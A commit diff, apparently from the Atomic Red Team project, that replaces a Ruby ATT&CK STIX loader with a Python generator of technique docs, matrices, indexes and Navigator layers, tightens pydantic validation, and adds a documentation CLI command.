external_refs = item.get("external_references", [])
has_mitre_ref = any(
ref.get("source_name") == "mitre-attack" for ref in external_refs
)
if has_mitre_ref:
self._techniques.append(item)
return self._techniques
def get_tactics(self) -> List[dict]:
"""
Returns a list of all ATT&CK tactics.
Returns:
List of tactic dictionaries.
"""
stix_data = self._load_stix()
tactics = []
for item in stix_data.get("objects", []):
if item.get("type") == "x-mitre-tactic":
tactics.append(item)
return tactics
# Singleton instance for convenience - lazy loaded
_attack_api: Optional[Attack] = None
def get_attack_api() -> Attack:
"""Get or create the singleton Attack API instance."""
global _attack_api
if _attack_api is None:
_attack_api = Attack()
return _attack_api
# For backwards compatibility
ATTACK_API = Attack()
atomic_red_team/attack_api.rb
-119
View File
@@ -1,119 +0,0 @@
require 'open-uri'
require 'json'
#
# Attack is an API class that loads information about ATT&CK techniques from MITRE'S ATT&CK
# STIX representation. It makes it very simple to do common things with ATT&CK.
#
class Attack
#
# Tactics as presented in the order that the ATT&CK matrics uses
#
def ordered_tactics
[
'initial-access',
'execution',
'persistence',
'privilege-escalation',
'defense-evasion',
'credential-access',
'discovery',
'lateral-movement',
'collection',
'exfiltration',
'command-and-control',
'impact'
]
end
#
# Returns the technique identifier (T1234) for a Technique object
#
def technique_identifier_for_technique(technique)
technique.fetch('external_references', []).find do |refs|
refs['source_name'] == 'mitre-attack'
end['external_id'].upcase
end
#
# Returns a Technique object given a technique identifier (T1234)
#
def technique_info(technique_id)
techniques.find do |item|
item.fetch('external_references', []).find do |references|
references['external_id'] == technique_id.upcase
end
end
end
#
# Returns the ATT&CK Matrix as a 2D array, in order by `ordered_tactics`
#
def ordered_tactic_to_technique_matrix(only_platform: /.*/)
all_techniques = techniques_by_tactic(only_platform: only_platform)
# make an 2d array of our techniques in the order our tactics appear
all_techniques_in_tactic_order = []
ordered_tactics.each do |tactic|
all_techniques_in_tactic_order << all_techniques[tactic]
end
# figure out the max number of techniques any one tactic has
max_techniques = all_techniques_in_tactic_order.collect(&:count).max
# extend each array of techniques to that length
all_techniques_in_tactic_order.each {|techniques| techniques.concat(Array.new(max_techniques - techniques.count, nil))}
# transpose to give us the data in columnar format
all_techniques_in_tactic_order.transpose
end
#
# Returns a map of all [ ATT&CK Tactic name ] => [ List of ATT&CK techniques associated with that tactic]
#
def techniques_by_tactic(only_platform: /.*/)
techniques_by_tactic = Hash.new {|h, k| h[k] = []}
techniques.each do |technique|
next unless !technique['x_mitre_platforms'].nil?
next unless technique['x_mitre_platforms'].any? { |platform| platform.downcase.sub(" ", "-") =~ only_platform }
next unless technique.fetch('revoked', false) == false
next unless technique.fetch('x_mitre_deprecated', false) == false
technique.fetch('kill_chain_phases', []).select { |phase| phase['kill_chain_name'] == 'mitre-attack' }.each do |tactic|
techniques_by_tactic[tactic.fetch('phase_name')] << technique
end
end
techniques_by_tactic
end
#
# Returns a list of all ATT&CK techniques
#
def techniques
return @techniques unless @techniques.nil?
# pull out the attack pattern objects
@techniques = attack_stix.fetch("objects").select do |item|
item.fetch('type') == 'attack-pattern' && item.fetch('external_references', []).select do |references|
references['source_name'] == 'mitre-attack'
end
end
end
private
#
# Returns the complete ATT&CK STIX collection parsed into a Hash
#
def attack_stix
@attack_stix ||= begin
# load the full attack library
local_attack_json_to_try = "#{File.dirname(__FILE__)}/enterprise-attack.json"
if File.exist? local_attack_json_to_try
JSON.parse File.read(local_attack_json_to_try)
else
JSON.parse open('https://raw.githubusercontent.com/mitre/cti/master/enterprise-attack/enterprise-attack.json').read
end
end
end
end
atomic_red_team/doc_generator.py
+729
View File
@@ -0,0 +1,729 @@
"""
Atomic Red Team documentation generator.
This module generates all documentation including:
- Individual technique markdown files
- ATT&CK matrices (markdown)
- Platform-specific indexes (markdown, CSV, YAML)
- ATT&CK Navigator layers (JSON)
"""
import csv
import json
import re
from concurrent.futures import ProcessPoolExecutor, as_completed
from io import StringIO
from pathlib import Path
from typing import Dict, List, Optional, Pattern, Tuple
from atomic_red_team.attack_api import ATTACK_API
from atomic_red_team.utils import ATOMIC_RED_TEAM, AtomicRedTeam
import yaml
# Platform configurations for index generation
PLATFORM_CONFIGS = {
"all": {"pattern": re.compile(r".*"), "attack_pattern": re.compile(r".*")},
"windows": {
"pattern": re.compile(r"windows"),
"attack_pattern": re.compile(r"windows"),
},
"macos": {
"pattern": re.compile(r"macos"),
"attack_pattern": re.compile(r"windows"),
},
"linux": {
"pattern": re.compile(r"linux"),
"attack_pattern": re.compile(r"windows"),
},
"iaas": {"pattern": re.compile(r"iaas"), "attack_pattern": re.compile(r"windows")},
"containers": {
"pattern": re.compile(r"containers"),
"attack_pattern": re.compile(r"windows"),
},
"office-365": {
"pattern": re.compile(r"office-365"),
"attack_pattern": re.compile(r"office"),
},
"google-workspace": {
"pattern": re.compile(r"google-workspace"),
"attack_pattern": re.compile(r"office"),
},
"azure-ad": {
"pattern": re.compile(r"azure-ad"),
"attack_pattern": re.compile(r"identity"),
},
"esxi": {"pattern": re.compile(r"esxi"), "attack_pattern": re.compile(r"esxi")},
"iaas:gcp": {
"pattern": re.compile(r"iaas:gcp"),
"attack_pattern": re.compile(r".*"),
},
"iaas:azure": {
"pattern": re.compile(r"iaas:azure"),
"attack_pattern": re.compile(r".*"),
},
"iaas:aws": {
"pattern": re.compile(r"iaas:aws"),
"attack_pattern": re.compile(r".*"),
},
}
def _generate_technique_doc_worker(
args: Tuple[dict, str],
) -> Tuple[str, bool, Optional[str]]:
"""Standalone function for ProcessPoolExecutor to generate a single technique doc."""
atomic_yaml, atomics_directory = args
try:
art = AtomicRedTeam(atomics_directory=atomics_directory)
yaml_path = atomic_yaml["atomic_yaml_path"]
md_path = yaml_path.replace(".yaml", ".md")
technique_id = atomic_yaml.get("attack_technique", "").upper()
art.generate_technique_docs(technique_id, md_path)
return (yaml_path, True, None)
except Exception as ex:
return (atomic_yaml.get("atomic_yaml_path", "unknown"), False, str(ex))
def _generate_matrix_worker(args: Tuple[str, str, str, Optional[str]]) -> None:
"""Standalone function for ProcessPoolExecutor to generate a matrix."""
title_prefix, output_path, atomics_directory, platform_pattern = args
import importlib
from pathlib import Path
doc_generator = importlib.import_module('atomic_red_team.doc_generator')
utils = importlib.import_module('atomic_red_team.utils')
art = utils.AtomicRedTeam(atomics_directory=atomics_directory)
docs = doc_generator.AtomicRedTeamDocs(atomic_red_team=art)
pattern = re.compile(platform_pattern) if platform_pattern else re.compile(r".*")
docs.generate_attack_matrix(title_prefix, Path(output_path), only_platform=pattern)
def _generate_index_worker(
args: Tuple[str, str, str, Optional[str], Optional[str]],
) -> None:
"""Standalone function for ProcessPoolExecutor to generate a markdown index."""
(
title_prefix,
output_path,
atomics_directory,
only_platform_pattern,
attack_platform_pattern,
) = args
import importlib
from pathlib import Path
doc_generator = importlib.import_module('atomic_red_team.doc_generator')
utils = importlib.import_module('atomic_red_team.utils')
art = utils.AtomicRedTeam(atomics_directory=atomics_directory)
docs = doc_generator.AtomicRedTeamDocs(atomic_red_team=art)
only_platform = (
re.compile(only_platform_pattern)
if only_platform_pattern
else re.compile(r".*")
)
attack_platform = (
re.compile(attack_platform_pattern)
if attack_platform_pattern
else re.compile(r".*")
)
docs.generate_index(
title_prefix,
Path(output_path),
only_platform=only_platform,
attack_platform=attack_platform,
)
def _generate_index_csv_worker(
args: Tuple[str, str, Optional[str], Optional[str]],
) -> None:
"""Standalone function for ProcessPoolExecutor to generate a CSV index."""
output_path, atomics_directory, only_platform_pattern, attack_platform_pattern = (
args
)
import importlib
from pathlib import Path
doc_generator = importlib.import_module('atomic_red_team.doc_generator')
utils = importlib.import_module('atomic_red_team.utils')
art = utils.AtomicRedTeam(atomics_directory=atomics_directory)
docs = doc_generator.AtomicRedTeamDocs(atomic_red_team=art)
only_platform = (
re.compile(only_platform_pattern)
if only_platform_pattern
else re.compile(r".*")
)
attack_platform = (
re.compile(attack_platform_pattern)
if attack_platform_pattern
else re.compile(r".*")
)
docs.generate_index_csv(
Path(output_path), only_platform=only_platform, attack_platform=attack_platform
)
def _generate_yaml_index_worker(args: Tuple[str, str]) -> None:
"""Standalone function for ProcessPoolExecutor to generate a YAML index."""
output_path, atomics_directory = args
import importlib
from pathlib import Path
doc_generator = importlib.import_module('atomic_red_team.doc_generator')
utils = importlib.import_module('atomic_red_team.utils')
art = utils.AtomicRedTeam(atomics_directory=atomics_directory)
docs = doc_generator.AtomicRedTeamDocs(atomic_red_team=art)
docs.generate_yaml_index(Path(output_path))
def _generate_yaml_index_by_platform_worker(args: Tuple[str, str, str]) -> None:
"""Standalone function for ProcessPoolExecutor to generate a platform-specific YAML index."""
output_path, atomics_directory, platform = args
import importlib
from pathlib import Path
doc_generator = importlib.import_module('atomic_red_team.doc_generator')
utils = importlib.import_module('atomic_red_team.utils')
art = utils.AtomicRedTeam(atomics_directory=atomics_directory)
docs = doc_generator.AtomicRedTeamDocs(atomic_red_team=art)
docs.generate_yaml_index_by_platform(Path(output_path), platform)
class AtomicRedTeamDocs:
"""
Documentation generator for Atomic Red Team.
Generates all documentation including technique docs, indexes, matrices,
and ATT&CK Navigator layers.
"""
def __init__(self, atomic_red_team: Optional[AtomicRedTeam] = None):
"""Initialize the documentation generator."""
self.atomic_red_team = atomic_red_team or ATOMIC_RED_TEAM
self.atomics_directory = self.atomic_red_team.atomics_directory
def generate_all_the_docs(self) -> Tuple[List[str], List[str]]:
"""
Generate all documentation used by Atomic Red Team.
Returns:
Tuple of (successful_paths, failed_paths)
"""
oks = []
fails = []
# Generate individual technique docs concurrently
with ProcessPoolExecutor() as executor:
future_to_yaml = {
executor.submit(
_generate_technique_doc_worker,
(atomic_yaml, self.atomics_directory),
): atomic_yaml
for atomic_yaml in self.atomic_red_team.atomic_tests
}
for future in as_completed(future_to_yaml):
yaml_path, success, error = future.result()
if success:
oks.append(yaml_path)
else:
fails.append(yaml_path)
print(f"{yaml_path}: {error}")
print(f"\nGenerated docs for {len(oks)} techniques, {len(fails)} failures")
# Prepare directories
indexes_dir = Path(self.atomics_directory) / "Indexes"
matrices_dir = indexes_dir / "Matrices"
md_indexes_dir = indexes_dir / "Indexes-Markdown"
csv_indexes_dir = indexes_dir / "Indexes-CSV"
layers_dir = indexes_dir / "Attack-Navigator-Layers"
for dir_path in [matrices_dir, md_indexes_dir, csv_indexes_dir, layers_dir]:
dir_path.mkdir(parents=True, exist_ok=True)
print("\nGenerating indexes and matrices concurrently...")
# Prepare all index generation tasks
tasks = []
# ATT&CK matrices
tasks.append(("matrix", _generate_matrix_worker, ("All", str(matrices_dir / "matrix.md"), self.atomics_directory, None)))
tasks.append(("windows-matrix", _generate_matrix_worker, ("Windows", str(matrices_dir / "windows-matrix.md"), self.atomics_directory, r"windows")))
tasks.append(("macos-matrix", _generate_matrix_worker, ("macOS", str(matrices_dir / "macos-matrix.md"), self.atomics_directory, r"macos")))
tasks.append(("linux-matrix", _generate_matrix_worker, ("Linux", str(matrices_dir / "linux-matrix.md"), self.atomics_directory, r"linux")))
tasks.append(("esxi-matrix", _generate_matrix_worker, ("ESXi", str(matrices_dir / "esxi-matrix.md"), self.atomics_directory, r"esxi")))
# Markdown indexes
tasks.append(("md-index-all", _generate_index_worker, ("All", str(md_indexes_dir / "index.md"), self.atomics_directory, None, None)))
tasks.append(("md-index-windows", _generate_index_worker, ("Windows", str(md_indexes_dir / "windows-index.md"), self.atomics_directory, r"windows", r"windows")))
tasks.append(("md-index-macos", _generate_index_worker, ("macOS", str(md_indexes_dir / "macos-index.md"), self.atomics_directory, r"macos", r"windows")))
tasks.append(("md-index-linux", _generate_index_worker, ("Linux", str(md_indexes_dir / "linux-index.md"), self.atomics_directory, r"linux", r"windows")))
tasks.append(("md-index-iaas", _generate_index_worker, ("IaaS", str(md_indexes_dir / "iaas-index.md"), self.atomics_directory, r"iaas", r"windows")))
tasks.append(("md-index-containers", _generate_index_worker, ("Containers", str(md_indexes_dir / "containers-index.md"), self.atomics_directory, r"containers", r"windows")))
tasks.append(("md-index-office365", _generate_index_worker, ("Office 365", str(md_indexes_dir / "office-365-index.md"), self.atomics_directory, r"office-365", r"office")))
tasks.append(("md-index-google-workspace", _generate_index_worker, ("Google Workspace", str(md_indexes_dir / "google-workspace-index.md"), self.atomics_directory, r"google-workspace", r"office")))
tasks.append(("md-index-azure-ad", _generate_index_worker, ("Azure AD", str(md_indexes_dir / "azure-ad-index.md"), self.atomics_directory, r"azure-ad", r"identity")))
tasks.append(("md-index-esxi", _generate_index_worker, ("ESXi", str(md_indexes_dir / "esxi-index.md"), self.atomics_directory, r"esxi", r"esxi")))
# CSV indexes
tasks.append(("csv-index-all", _generate_index_csv_worker, (str(csv_indexes_dir / "index.csv"), self.atomics_directory, None, None)))
tasks.append(("csv-index-windows", _generate_index_csv_worker, (str(csv_indexes_dir / "windows-index.csv"), self.atomics_directory, r"windows", r"windows")))
tasks.append(("csv-index-macos", _generate_index_csv_worker, (str(csv_indexes_dir / "macos-index.csv"), self.atomics_directory, r"macos", r"macos")))
tasks.append(("csv-index-linux", _generate_index_csv_worker, (str(csv_indexes_dir / "linux-index.csv"), self.atomics_directory, r"linux", r"linux")))
tasks.append(("csv-index-iaas", _generate_index_csv_worker, (str(csv_indexes_dir / "iaas-index.csv"), self.atomics_directory, r"iaas", r"iaas")))
tasks.append(("csv-index-containers", _generate_index_csv_worker, (str(csv_indexes_dir / "containers-index.csv"), self.atomics_directory, r"containers", r"containers")))
tasks.append(("csv-index-office365", _generate_index_csv_worker, (str(csv_indexes_dir / "office-365-index.csv"), self.atomics_directory, r"office-365", r"office")))
tasks.append(("csv-index-google-workspace", _generate_index_csv_worker, (str(csv_indexes_dir / "google-workspace-index.csv"), self.atomics_directory, r"google-workspace", r"identity")))
tasks.append(("csv-index-azure-ad", _generate_index_csv_worker, (str(csv_indexes_dir / "azure-ad-index.csv"), self.atomics_directory, r"azure-ad", r"identity")))
tasks.append(("csv-index-esxi", _generate_index_csv_worker, (str(csv_indexes_dir / "esxi-index.csv"), self.atomics_directory, r"esxi", r"esxi")))
# YAML indexes
tasks.append(("yaml-index-all", _generate_yaml_index_worker, (str(indexes_dir / "index.yaml"), self.atomics_directory)))
for platform in ["windows", "macos", "linux", "office-365", "azure-ad", "google-workspace", "iaas", "containers", "iaas:gcp", "iaas:azure", "iaas:aws", "esxi"]:
filename = f"{platform.replace(':', '_')}-index.yaml"
tasks.append((f"yaml-index-{platform}", _generate_yaml_index_by_platform_worker, (str(indexes_dir / filename), self.atomics_directory, platform)))
# Generate all indexes concurrently
with ProcessPoolExecutor() as executor:
future_to_task = {executor.submit(task[1], task[2]): task[0] for task in tasks}
for future in as_completed(future_to_task):
task_name = future_to_task[future]
try:
future.result()
except Exception as ex:
print(f"✗ Error generating {task_name}: {ex}")
# Generate ATT&CK Navigator layers (this is already optimized internally)
print("\nGenerating ATT&CK Navigator layers...")
self.generate_navigator_layers(layers_dir)
return oks, fails
def generate_attack_matrix(
self,
title_prefix: str,
output_path: Path,
only_platform: Pattern = re.compile(r".*"),
) -> None:
"""Generate a Markdown ATT&CK matrix."""
result = f"# {title_prefix} Atomic Tests by ATT&CK Tactic & Technique\n"
result += f"| {' | '.join(ATTACK_API.ordered_tactics)} |\n"
result += f"|{'-----|' * len(ATTACK_API.ordered_tactics)}\n"
matrix = ATTACK_API.ordered_tactic_to_technique_matrix(
only_platform=only_platform
)
for row in matrix:
row_values = []
for technique in row:
if technique:
row_values.append(
self.atomic_red_team.github_link_to_technique(
technique,
include_identifier=False,
only_platform=only_platform,
)
)
else:
row_values.append("")
result += f"| {' | '.join(row_values)} |\n"
output_path.write_text(result, encoding="utf-8")
print(f"Generated ATT&CK matrix at {output_path}")
def generate_index(
self,
title_prefix: str,
output_path: Path,
only_platform: Pattern = re.compile(r".*"),
attack_platform: Pattern = re.compile(r".*"),
) -> None:
"""Generate a Markdown index of ATT&CK Tactic -> Technique -> Atomic Tests."""
result = f"# {title_prefix} Atomic Tests by ATT&CK Tactic & Technique\n"
techniques_by_tactic = ATTACK_API.techniques_by_tactic(
only_platform=attack_platform
)
for tactic, techniques in techniques_by_tactic.items():
result += f"# {tactic}\n"
for technique in techniques:
result += f"- {self.atomic_red_team.github_link_to_technique(technique, include_identifier=True, only_platform=only_platform)}\n"
atomic_tests = self.atomic_red_team.atomic_tests_for_technique(
technique
)
for i, atomic_test in enumerate(atomic_tests):
platforms = atomic_test.get("supported_platforms", [])
if any(only_platform.match(p.lower()) for p in platforms):
result += f" - Atomic Test #{i + 1}: {atomic_test['name']} [{', '.join(platforms)}]\n"
result += "\n"
output_path.write_text(result, encoding="utf-8")
print(f"Generated Atomic Red Team index at {output_path}")
def generate_index_csv(
self,
output_path: Path,
only_platform: Pattern = re.compile(r".*"),
attack_platform: Pattern = re.compile(r".*"),
) -> None:
"""Generate a CSV index."""
output = StringIO(newline="")
writer = csv.writer(output, lineterminator="\n")
writer.writerow(
[
"Tactic",
"Technique #",
"Technique Name",
"Test #",
"Test Name",
"Test GUID",
"Executor Name",
]
)
techniques_by_tactic = ATTACK_API.techniques_by_tactic(
only_platform=attack_platform
)
for tactic, techniques in techniques_by_tactic.items():
for technique in techniques:
tech_id = ATTACK_API.technique_identifier_for_technique(technique)
# Get atomic YAML to use display_name (which has full technique name for sub-techniques)
atomic_yaml = self.atomic_red_team._get_atomic_by_id(tech_id)
if not atomic_yaml:
continue
tech_name = atomic_yaml.get("display_name", technique.get("name", ""))
atomic_tests = self.atomic_red_team.atomic_tests_for_technique(
technique
)
for i, atomic_test in enumerate(atomic_tests):
platforms = atomic_test.get("supported_platforms", [])
if any(only_platform.match(p.lower()) for p in platforms):
writer.writerow(
[
tactic,
tech_id,
tech_name,
i + 1,
atomic_test.get("name", ""),
atomic_test.get("auto_generated_guid", ""),
atomic_test.get("executor", {}).get("name", ""),
]
)
output_path.write_text(output.getvalue(), encoding="utf-8")
print(f"Generated Atomic Red Team CSV index at {output_path}")
def generate_yaml_index(self, output_path: Path) -> None:
"""Generate a master YAML index."""
result: Dict[str, dict] = {}
techniques_by_tactic = ATTACK_API.techniques_by_tactic()
for tactic, techniques in techniques_by_tactic.items():
result[tactic] = {}
for technique in techniques:
tech_id = ATTACK_API.technique_identifier_for_technique(technique)
# Create a copy of the technique and update name with display_name from YAML
technique_copy = json.loads(json.dumps(technique)) # Deep copy
atomic_yaml = self.atomic_red_team._get_atomic_by_id(tech_id)
if atomic_yaml and atomic_yaml.get("display_name"):
technique_copy["name"] = atomic_yaml["display_name"]
result[tactic][tech_id] = {
"technique": technique_copy,
"atomic_tests": self.atomic_red_team.atomic_tests_for_technique(
technique
),
}
# Convert through JSON to eliminate YAML aliases (matching Ruby behavior)
# Use explicit_start=True to add '---' at the beginning like Ruby
yaml_content = yaml.dump(
json.loads(json.dumps(result)),
default_flow_style=False,
allow_unicode=True,
sort_keys=False,
explicit_start=True,
)
output_path.write_text(yaml_content, encoding="utf-8")
print(f"Generated Atomic Red Team YAML index at {output_path}")
def generate_yaml_index_by_platform(self, output_path: Path, platform: str) -> None:
"""Generate a platform-specific YAML index."""
result: Dict[str, dict] = {}
techniques_by_tactic = ATTACK_API.techniques_by_tactic()
for tactic, techniques in techniques_by_tactic.items():
result[tactic] = {}
for technique in techniques:
tech_id = ATTACK_API.technique_identifier_for_technique(technique)
# Create a copy of the technique and update name with display_name from YAML
technique_copy = json.loads(json.dumps(technique)) # Deep copy
atomic_yaml = self.atomic_red_team._get_atomic_by_id(tech_id)
if atomic_yaml and atomic_yaml.get("display_name"):
technique_copy["name"] = atomic_yaml["display_name"]
result[tactic][tech_id] = {
"technique": technique_copy,
"atomic_tests": self.atomic_red_team.atomic_tests_for_technique_by_platform(
technique, platform
),
}
yaml_content = yaml.dump(
json.loads(json.dumps(result)),
default_flow_style=False,
allow_unicode=True,
sort_keys=False,
explicit_start=True,
)
output_path.write_text(yaml_content, encoding="utf-8")
print(f"Generated Atomic Red Team YAML index at {output_path}")
def _get_layer(self, techniques: List[dict], layer_name: str) -> dict:
"""Create an ATT&CK Navigator layer structure."""
filters = {}
if "Windows" in layer_name:
filters = {"platforms": ["Windows"]}
elif "macOS" in layer_name:
filters = {"platforms": ["macOS"]}
elif "Linux" in layer_name:
filters = {"platforms": ["Linux"]}
return {
"name": layer_name,
"versions": {"attack": "16", "navigator": "5.1.0", "layer": "4.5"},
"description": f"{layer_name} MITRE ATT&CK Navigator Layer",
"domain": "enterprise-attack",
"filters": filters,
"gradient": {
"colors": ["#ffffff", "#ce232e"],
"minValue": 0,
"maxValue": 10,
},
"legendItems": [
{"label": "10 or more tests", "color": "#ce232e"},
{"label": "1 or more tests", "color": "#ffffff"},
],
"techniques": techniques,
}
def _update_techniques_list(
self,
current_technique: dict,
current_technique_parent: dict,
techniques_list: List[dict],
atomic_yaml: dict,
comments: bool,
) -> None:
"""Update the techniques list with a new technique."""
tech_id = atomic_yaml.get("attack_technique", "")
if "." not in tech_id:
# This is a parent technique
tech_parent = next(
(
t
for t in techniques_list
if t["techniqueID"] == tech_id.split(".")[0]
),
None,
)
if tech_parent:
tech_parent["score"] += current_technique["score"]
if comments:
tech_parent["comment"] = current_technique.get("comment", "")
else:
if not comments:
current_technique.pop("comment", None)
techniques_list.append(current_technique)
else:
# This is a sub-technique
parent_id = tech_id.split(".")[0]
tech_parent = next(
(t for t in techniques_list if t["techniqueID"] == parent_id), None
)
if tech_parent:
tech_parent["score"] += current_technique["score"]
else:
current_technique_parent["score"] += current_technique["score"]
techniques_list.append(current_technique_parent)
if not comments:
current_technique.pop("comment", None)
techniques_list.append(current_technique)
def generate_navigator_layers(self, output_dir: Path) -> None:
"""Generate all ATT&CK Navigator layers."""
# Initialize technique lists for each platform
platforms_data = {
"all": [],
"windows": [],
"macos": [],
"linux": [],
"iaas": [],
"iaas_aws": [],
"iaas_azure": [],
"iaas_gcp": [],
"containers": [],
"google_workspace": [],
"azure_ad": [],
"office_365": [],
"esxi": [],
}
platform_patterns = {
"windows": re.compile(r"windows", re.I),
"macos": re.compile(r"macos", re.I),
"linux": re.compile(r"linux", re.I),
"iaas": re.compile(r"^iaas", re.I),
"iaas_aws": re.compile(r"^iaas:aws", re.I),
"iaas_azure": re.compile(r"^iaas:azure", re.I),
"iaas_gcp": re.compile(r"^iaas:gcp", re.I),
"containers": re.compile(r"^containers", re.I),
"google_workspace": re.compile(r"^google-workspace", re.I),
"azure_ad": re.compile(r"^azure-ad", re.I),
"office_365": re.compile(r"^office-365", re.I),
"esxi": re.compile(r"^esxi", re.I),
}
for atomic_yaml in self.atomic_red_team.atomic_tests:
tech_id = atomic_yaml.get("attack_technique", "")
base_technique = {
"techniqueID": tech_id,
"score": 0,
"enabled": True,
"comment": "\n",
"links": [
{
"label": "View Atomic",
"url": f"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/{tech_id}/{tech_id}.md",
}
],
}
base_parent = {
"techniqueID": tech_id.split(".")[0],
"score": 0,
"enabled": True,
"links": [
{
"label": "View Atomic",
"url": f"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/{tech_id.split('.')[0]}/{tech_id.split('.')[0]}.md",
}
],
}
# Create platform-specific technique copies
techniques = {
key: {**base_technique, "comment": "\n"} for key in platforms_data
}
technique_parents = {key: {**base_parent} for key in platforms_data}
has_tests = {key: False for key in platforms_data}
for atomic in atomic_yaml.get("atomic_tests", []):
techniques["all"]["score"] += 1
supported_platforms = atomic.get("supported_platforms", [])
for platform_key, pattern in platform_patterns.items():
if any(pattern.match(p) for p in supported_platforms):
has_tests[platform_key] = True
techniques[platform_key]["score"] += 1
techniques[platform_key]["comment"] += f"- {atomic['name']}\n"
# Update the all techniques list
self._update_techniques_list(
techniques["all"],
technique_parents["all"],
platforms_data["all"],
atomic_yaml,
False,
)
# Update platform-specific lists
for platform_key in platform_patterns:
if has_tests[platform_key]:
self._update_techniques_list(
techniques[platform_key],
technique_parents[platform_key],
platforms_data[platform_key],
atomic_yaml,
True,
)
# Write layers
layer_configs = [
("all", "art-navigator-layer.json", "Atomic Red Team"),
(
"windows",
"art-navigator-layer-windows.json",
"Atomic Red Team (Windows)",
),
("macos", "art-navigator-layer-macos.json", "Atomic Red Team (macOS)"),
("linux", "art-navigator-layer-linux.json", "Atomic Red Team (Linux)"),
("iaas", "art-navigator-layer-iaas.json", "Atomic Red Team (Iaas)"),
(
"iaas_aws",
"art-navigator-layer-iaas-aws.json",
"Atomic Red Team (Iaas:AWS)",
),
(
"iaas_azure",
"art-navigator-layer-iaas-azure.json",
"Atomic Red Team (Iaas:Azure)",
),
(
"iaas_gcp",
"art-navigator-layer-iaas-gcp.json",
"Atomic Red Team (Iaas:GCP)",
),
(
"containers",
"art-navigator-layer-containers.json",
"Atomic Red Team (Containers)",
),
(
"google_workspace",
"art-navigator-layer-google-workspace.json",
"Atomic Red Team (Google-Workspace)",
),
(
"azure_ad",
"art-navigator-layer-azure-ad.json",
"Atomic Red Team (Azure-AD)",
),
(
"office_365",
"art-navigator-layer-office-365.json",
"Atomic Red Team (Office-365)",
),
("esxi", "art-navigator-layer-esxi.json", "Atomic Red Team (ESXi)"),
]
for platform_key, filename, layer_name in layer_configs:
layer = self._get_layer(platforms_data[platform_key], layer_name)
output_path = output_dir / filename
# Use separators without spaces to match Ruby's compact JSON output
output_path.write_text(
json.dumps(layer, separators=(",", ":")), encoding="utf-8"
)
print(f"Generated Atomic Red Team ATT&CK Navigator Layer at {output_path}")
def generate_all_docs() -> Tuple[List[str], List[str]]:
"""Generate all Atomic Red Team documentation."""
return AtomicRedTeamDocs().generate_all_the_docs()
atomic_red_team/models.py
+25 -12
View File
@@ -121,13 +121,7 @@ Argument = Annotated[
]
class StrictModel(BaseModel):
model_config = ConfigDict(
validate_default=True, extra="forbid", validate_assignment=True
)
class Executor(StrictModel):
class Executor(BaseModel):
name: ExecutorType
elevation_required: bool = False
@@ -140,16 +134,32 @@ class ManualExecutor(Executor):
class CommandExecutor(Executor):
name: Literal["powershell", "sh", "bash", "command_prompt"]
command: constr(min_length=1)
cleanup_command: Optional[str] = None
cleanup_command: Optional[constr(min_length=1)] = None
@field_validator("cleanup_command", mode="before")
@classmethod
def validate_cleanup_command(cls, v):
"""Reject empty cleanup_command strings - treat them as None or error."""
if v is not None and isinstance(v, str) and v.strip() == "":
raise PydanticCustomError(
"empty_cleanup_command",
"'cleanup_command' shouldn't be empty. Provide a valid command or remove the key from YAML",
{"loc": ["executor", "cleanup_command"], "input": v},
)
return v
class Dependency(StrictModel):
class Dependency(BaseModel):
description: constr(min_length=1)
prereq_command: constr(min_length=1)
get_prereq_command: Optional[str]
class Atomic(StrictModel):
class Atomic(BaseModel):
model_config = ConfigDict(
validate_default=True, extra="forbid", validate_assignment=True
)
test_number: Optional[str] = None
name: constr(min_length=1)
description: constr(min_length=1)
@@ -237,7 +247,7 @@ class Atomic(StrictModel):
return v
class Technique(StrictModel):
class Technique(BaseModel):
attack_technique: AttackTechniqueID
display_name: str = Field(..., min_length=5)
atomic_tests: List[Atomic] = Field(min_length=1)
@@ -257,7 +267,10 @@ class Technique(StrictModel):
"empty_dependency_executor_name",
"'dependency_executor_name' shouldn't be empty. Provide a valid value ['manual','powershell', 'sh', "
"'bash', 'command_prompt'] or remove the key from YAML",
{"loc": ["atomic_tests", i, "dependency_executor_name"], "input": value},
{
"loc": ["atomic_tests", i, "dependency_executor_name"],
"input": value,
},
)
return data
atomic_red_team/runner.py
+66 -2
View File
@@ -5,18 +5,20 @@ import sys
import urllib.parse
from collections import defaultdict
from functools import partial
from typing import Annotated
from pathlib import Path
from typing import Annotated, Optional
import typer
from pydantic import ValidationError
from atomic_red_team.common import used_guids_file, atomics_path
from atomic_red_team.common import atomics_path, used_guids_file
from atomic_red_team.guid import (
generate_guids_for_yaml,
get_unique_guid,
)
from atomic_red_team.labels import GithubAPI
from atomic_red_team.models import Technique
from atomic_red_team.utils import ATOMIC_RED_TEAM
from atomic_red_team.validator import Validator, format_validation_error, yaml
app = typer.Typer(help="Atomic Red Team Maintenance tool CLI helper")
@@ -107,5 +109,67 @@ def validate():
sys.exit(1)
@app.command()
def generate_docs(
technique_id: Annotated[
Optional[str],
typer.Option(
"--technique", "-t", help="Specific technique ID to generate docs for"
),
] = None,
output_dir: Annotated[
Optional[str],
typer.Option("--output", "-o", help="Output directory for documentation"),
] = None,
full: Annotated[
bool,
typer.Option("--full", "-f", help="Generate all docs including indexes, matrices, and navigator layers"),
] = False,
):
"""Generate Markdown documentation for atomic tests.
Use --full to generate all documentation including:
- Individual technique markdown files
- ATT&CK matrices (markdown)
- Platform-specific indexes (markdown, CSV, YAML)
- ATT&CK Navigator layers (JSON)
"""
if full:
# Generate all documentation including indexes
from atomic_red_team.doc_generator import generate_all_docs
oks, fails = generate_all_docs()
if fails:
sys.exit(len(fails))
return
if output_dir is None:
output_dir = atomics_path
if technique_id:
# Generate docs for a specific technique
technique_id = technique_id.upper()
output_path = Path(output_dir) / technique_id / f"{technique_id}.md"
try:
ATOMIC_RED_TEAM.generate_technique_docs(technique_id, str(output_path))
print(f"Generated documentation for {technique_id} at {output_path}")
except ValueError as e:
print(f"Error: {e}")
sys.exit(1)
else:
# Generate docs for all techniques
count = 0
for atomic_yaml in ATOMIC_RED_TEAM.atomic_tests:
tech_id = atomic_yaml.get("attack_technique", "").upper()
if tech_id:
output_path = Path(output_dir) / tech_id / f"{tech_id}.md"
try:
ATOMIC_RED_TEAM.generate_technique_docs(tech_id, str(output_path))
count += 1
except Exception as e:
print(f"Error generating docs for {tech_id}: {e}")
print(f"Generated documentation for {count} techniques")
if __name__ == "__main__":
app()
atomic_red_team/test_data/extra_forbidden.yaml
-14
View File
@@ -1,14 +0,0 @@
attack_technique: W1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
